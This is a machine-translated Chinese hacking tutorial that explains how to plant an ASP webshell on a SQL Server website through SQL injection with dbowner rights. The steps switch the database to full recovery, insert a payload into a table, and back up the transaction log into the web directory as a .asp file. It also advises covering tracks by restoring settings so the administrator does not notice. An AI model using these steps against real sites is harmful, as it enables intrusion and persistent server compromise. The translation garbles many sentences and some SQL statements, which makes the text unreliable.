teach you to use log backup to get Webshell_ vulnerability research

Blog has been infiltrated a bit, do not know what you dropped something did not. Originally have a blog catalog can be listed, that I dropped a small thing, and then today people told me Nbsi 3 used the method of that thing ... Oh, a little dizzy, is the following, success rate is very high, we can try. Well, the way out of the matter, keep the article.   Dbowner by injecting a shell should not be a difficult situation, the more troublesome is that even with incremental backup, there are still many uncertainties, if the previous people have what wrong write information, may be backed up to get some of the 500 error, How can we improve the success rate and reusability? The method is more complex and less effective if it is viewed in terms of adjusting incremental backups, although it can achieve some effects. Coupled with considerations about reusability, such as the success rate of multiple backups, the backup database approach does not apply. Here is another way to back up the log file to the Web directory to get the shell.   to eat a mouthful of food, technical problems should be one of the solution, get Webshell first to know the physical path, and then can say the other. There are many ways to expose the physical path, and the injection can be obtained, which NBSI2 has done, no longer said. It is worth noting that if the database and the Web are separated, this will certainly not be Webshell, back out of the things can overwrite any file, some of the idea of the Start menu is still valid, just notice the extension. Pull away, anyway, if the database and the web in a piece, you have the opportunity, otherwise or think of other ways.   Then you want to get the current permissions and database name. If it is sysadmin, of course, there is no need to do very complicated things, dbowner enough, public is not. The currently open library name can be obtained with a db_name (), which is also very simple.   By default, the general choice of database failover types is simple, and it is not possible to back up the log files. However, we are all dbowner, what can not be done, as long as the modification of attributes can be.　　Because the Enterprise Manager can not be modified, only a section of SQL statement, very simple, so you can: alter database xxxx set recovery full  Where xxxx is the name of the database you get, after execution can back up the log. This modification is destructive, because you do not know the previous failure to restore the mode is what, careful administrator see Strange, may begin to suspect. If you can get the database beforeState, it is best to change the properties of the database after the backup is complete.   The rest of the story is how to get the database to record your data in the most original way. This corresponds to the problem of setting the table name image in Backup database, if you just create a table like this, the records in the log are still in a loose format, that is, < % % > Without any effect. Through the actual test, the discovery can still be recorded in a similar way with Backup database, as follows: create table cmd  (a image)   insert into cmd  (a)  values  (" backup log xxxx to disk")  =  ' c:\xxx\2.asp '   so you've got a Webshell. Is the   finished here? No, hehe, we go on.   Here are two branches, the first one, let the injection of the time does not appear single quotes, too simple, I do not bother to write; second, reduce the length of this webshell and increase the success rate. The following approach is to discuss the second branch of the problem, the same applies to the Backup database reduction.   First, initialize the log.　　 backup log XXXX to disk =  ' C:\caonima '  with init  This is a bit like the first step in an incremental backup, but a little different is that after you do this, the available shells that you back up are fixed. This is important because with this step, no matter what the administrator does in the database to disrupt your back database, or how many jerks you've had before (you're sure to) have something you don't like, and even after you've done it, Others in the back of your method to come once, or will succeed, this for occasional recurring, such as the other machine reload but the database and code unchanged, there is no small help.   Then adjust the order of the individual statements in backup. Through the 1th, the approximate steps have been identified, that is:  alter database xxxx set recovery full backup log xxxx to disk =  ' C:\ Sammy '  with init create table cmd  (a image)  insert into cmd   (a)  values  (')  backup log XXXX to disk =  ' c:\xxx\2.asp '   This is not good, feel a lot of useless things.  create table cmd  (A image)   Indeed a bit annoying, but this sentence is necessary, have to adjust the position, to get somewhere else. The reverse order seems to be a little bit smaller, as is the case for incremental in backup database, Backup database can even be backed up just after update, but it's complicated because of the storage format of the data. , not discussed here. After the adjustment is:  alter database xxxx set recovery full create table cmd   (a image)  backup log XXXX to disk =  ' C:\Sammy '  with  init insert into cmd  (a)  values  (" backup log xxxx to")  disk =  ' c:\xxx\2.asp '   successful, the backed up shell (2.asp above) has 78.5k, the file length is fixed 80,384 bytes. Very picky friend can accept it, of course, use this to generate a dryThe net Trojan also can-this is the top CS Trojan Horse's end, very general.